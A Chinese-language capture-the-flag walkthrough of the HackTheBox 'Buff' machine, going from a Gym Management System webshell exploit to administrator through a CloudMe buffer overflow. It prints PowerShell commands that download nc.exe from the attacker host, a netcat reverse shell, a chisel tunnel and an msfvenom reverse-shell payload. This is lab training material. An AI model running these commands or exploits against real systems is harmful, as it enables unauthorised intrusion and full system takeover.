免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
─(root💀kali)-[~/htb/buff]
└─# nmap -sV -Pn 10.10.10.198 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-12-01 07:24 EST
Nmap scan report for 10.10.10.198
Host is up (0.42s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 750.50 seconds
目录爆破
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.198:8080/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.198-8080/-_21-12-01_07-29-25.txt
Error Log: /root/dirsearch/logs/errors-21-12-01_07-29-25.log
Target: http://10.10.10.198:8080/
[07:29:30] Starting:
[07:30:04] 200 - 66B - /.gitattributes
[07:30:31] 200 - 309B - /Readme.md
[07:30:31] 200 - 309B - /README.md
[07:30:31] 200 - 309B - /ReadMe.md
[07:30:31] 200 - 309B - /README.MD
[07:30:31] 200 - 18KB - /LICENSE
[07:30:32] 301 - 344B - /Upload -> http://10.10.10.198:8080/Upload/
[07:30:32] 403 - 1KB - /Trace.axd::$DATA
[07:30:47] 200 - 5KB - /about.php
[07:32:06] 403 - 1KB - /cgi-bin/
[07:32:07] 403 - 1KB - /cgi.pl/
[07:32:08] 400 - 983B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[07:32:11] 200 - 1KB - /cgi-bin/printenv.pl
[07:32:16] 200 - 4KB - /contact.php
[07:32:27] 200 - 4KB - /edit.php
[07:32:28] 403 - 1KB - /error/
[07:32:32] 200 - 4KB - /feedback.php
[07:32:42] 200 - 143B - /home.php
[07:32:43] 301 - 341B - /img -> http://10.10.10.198:8080/img/
[07:32:44] 403 - 1KB - /include/
[07:32:44] 301 - 345B - /include -> http://10.10.10.198:8080/include/
[07:32:45] 403 - 1KB - /index.php::$DATA
[07:32:47] 200 - 5KB - /index.php
[07:32:47] 200 - 5KB - /index.php/login/
[07:32:47] 200 - 5KB - /index.php.
[07:32:47] 200 - 5KB - /index.pHp
[07:32:53] 200 - 18KB - /license
[07:33:22] 301 - 345B - /profile -> http://10.10.10.198:8080/profile/
[07:33:24] 200 - 309B - /readme.md
[07:33:26] 200 - 137B - /register.php
[07:33:29] 403 - 1KB - /server-info
[07:33:46] 200 - 209B - /up.php
[07:33:47] 301 - 344B - /upload -> http://10.10.10.198:8080/upload/
[07:33:48] 403 - 1KB - /upload/
[07:33:48] 200 - 107B - /upload.php
[07:33:53] 403 - 1KB - /web.config::$DATA
[07:33:55] 403 - 1KB - /webalizer 爆出了很多文件,一个个查看
readme.md 文件
gym management system
===================
Gym Management System
This the my gym management system it is made using PHP,CSS,HTML,Jquery,Twitter Bootstrap.
All sql table info can be found in table.sql.
more free projects
click here - https://projectworlds.in
YouTube Demo - https://youtu.be/J_7G_AahgSw
说是有一个 sql 文件,咱们浏览器关上table.sql,下载到本地。没有暴露出明码,不过咱们至多晓得了表构造和字段
/cgi-bin/printenv.pl 裸露了一些配置信息
COMSPEC="C:\Windows\system32\cmd.exe"
CONTEXT_DOCUMENT_ROOT="C:/xampp/cgi-bin/"
CONTEXT_PREFIX="/cgi-bin/"
DOCUMENT_ROOT="C:/xampp/htdocs/gym"
GATEWAY_INTERFACE="CGI/1.1"
HTTP_ACCEPT="text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
HTTP_ACCEPT_ENCODING="gzip, deflate"
HTTP_ACCEPT_LANGUAGE="en-US,en;q=0.5"
HTTP_CONNECTION="close"
HTTP_COOKIE="sec_session_id=je937e2bbb8rk56gfbtpl4ctld"
HTTP_HOST="10.10.10.198:8080"
HTTP_UPGRADE_INSECURE_REQUESTS="1"
HTTP_USER_AGENT="Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
MIBDIRS="C:/xampp/php/extras/mibs"
MYSQL_HOME="\xampp\mysql\bin"
OPENSSL_CONF="C:/xampp/apache/bin/openssl.cnf"
PATH="C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\shaun\AppData\Local\Microsoft\WindowsApps"
PATHEXT=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC"
PHPRC="\xampp\php"
PHP_PEAR_SYSCONF_DIR="\xampp\php"
QUERY_STRING=""REMOTE_ADDR="10.10.14.15"REMOTE_PORT="53838"REQUEST_METHOD="GET"REQUEST_SCHEME="http"REQUEST_URI="/cgi-bin/printenv.pl"SCRIPT_FILENAME="C:/xampp/cgi-bin/printenv.pl"SCRIPT_NAME="/cgi-bin/printenv.pl"SERVER_ADDR="10.10.10.198"SERVER_ADMIN="postmaster@localhost"SERVER_NAME="10.10.10.198"SERVER_PORT="8080"SERVER_PROTOCOL="HTTP/1.1"SERVER_SIGNATURE="<address>Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 Server at 10.10.10.198 Port 8080</address>\n"SERVER_SOFTWARE="Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6"SYSTEMROOT="C:\Windows"TMP="\xampp\tmp"WINDIR="C:\Windows"找了一圈文件,如同没啥特地能够利用的货色。留神到网站如同是用某个 cms 做的,用 Projectworlds.in exploit 做关键词,咱们找到了这个 cms 的一个攻打脚本
拿到初始 shell
┌──(root💀kali)-[~/htb/buff]
└─# python exp.py http://10.10.10.198:8080/ 1 ⨯
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
▒
buff\shaun
提权
这个 exp 的 shell 十分难用,咱们传两个实用工具到靶机,开一个趁手的 shell
powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.15:8000/nc.exe’,’C:\xampp\htdocs\gym\upload\nc.exe’)
powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.15:8000/wget.exe’,’C:\xampp\htdocs\gym\upload\wget.exe’)
靶机运行:
nc.exe 10.10.14.15 4242 -e cmd.exe
接管到反弹 shell:
┌──(root💀kali)-[~/htb/buff]
└─# nc -lnvp 4242 130 ⨯
listening on [any] 4242 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.198] 55993
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\gym\upload>
提权
查看所有正在监听的网络连接
C:\xampp\htdocs\gym\upload>netstat -ano | findstr "LISTENING"
netstat -ano | findstr "LISTENING"
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 948
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6012
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 5200
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 7228
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 524
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1136
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1640
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2212
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 688
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 2824
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 2356
TCP [::]:135 [::]:0 LISTENING 948
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 5200
TCP [::]:8080 [::]:0 LISTENING 7228
TCP [::]:49664 [::]:0 LISTENING 524
TCP [::]:49665 [::]:0 LISTENING 1136
TCP [::]:49666 [::]:0 LISTENING 1640
TCP [::]:49667 [::]:0 LISTENING 2212
TCP [::]:49668 [::]:0 LISTENING 672
TCP [::]:49669 [::]:0 LISTENING 688
能够看见有两个端口只监听了本地连接,别离是 3306 数据库还有一个 未知的 8888 端口服务。
数据库只容许本地连接很失常,少数是为了平安思考。
这个 8888 端口服务有时候枚举不进去,我用 winpea 没有发现,找了半天。。。手动枚举有时候也会不进去
记住 8888 端口的 PID 是:2356
这个服务的 PID 每隔一段时间就会变,十分坑爹
依据 PID 找二进制文件,咱们应用上面命令:
tasklist /v | findstr 2356
最初定位到是一个叫 CloudMe 的程序
c:\Users\shaun\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of c:\Users\shaun\Downloads
14/07/2020 12:27 <DIR> .
14/07/2020 12:27 <DIR> ..
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
1 File(s) 17,830,824 bytes
2 Dir(s) 7,572,029,440 bytes free
在 kali 上搜寻这个程序的破绽状况
┌──(root💀kali)-[~/htb/buff]
└─# searchsploit CloudMe
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
咱们把 48389.py 拷贝到当前目录
然而可怜的是靶机的环境并没有装置 python,因而得另寻方法。
隧道
咱们用 chisel 在靶机和攻击机之间建设一条隧道
在 github 上下载靶机应用的 exe 文件,以及 kali 应用的 bash 文件
靶机从 kali 下载 chisel.exe
c:\xampp\htdocs\gym\upload>wget http://10.10.14.15:8000/chisel.exe
wget http://10.10.14.15:8000/chisel.exe
--10:54:21-- http://10.10.14.15:8000/chisel.exe
=> `chisel.exe'
Connecting to 10.10.14.15:8000... connected.
HTTP request sent, awaiting response... 200 OK
10:54:28 (1.20 MB/s) - `chisel.exe' saved [8548352/8548352]
kali 服务端开启监听
./chisel server -p 8000 –reverse
windows 客户端连贯:
.\chisel.exe client 10.10.14.15:8000 R:8888:localhost:8888
在 kali 上曾经看到转发的 8888 端口服务:
┌──(root💀kali)-[~/htb/buff]
└─# netstat -ano |grep 8888
tcp6 0 0 :::8888 :::* LISTEN off (0.00/0/0)咱们用以下 payload 生成 bof 的字节码
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=443 -b ‘\x00\x0A\x0D’ -f python
更新到 48389.py 的 payload 里
在 kali 开启一个监听:
nc -lnvp 443
在 kali 执行
┌──(root💀kali)-[~/htb/buff]
└─# python3 48389.py 收到靶机的反弹 shell,曾经是 administrator 权限
┌──(root💀kali)-[~/htb/buff]
└─# nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.198] 49686
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
C:\Windows\system32>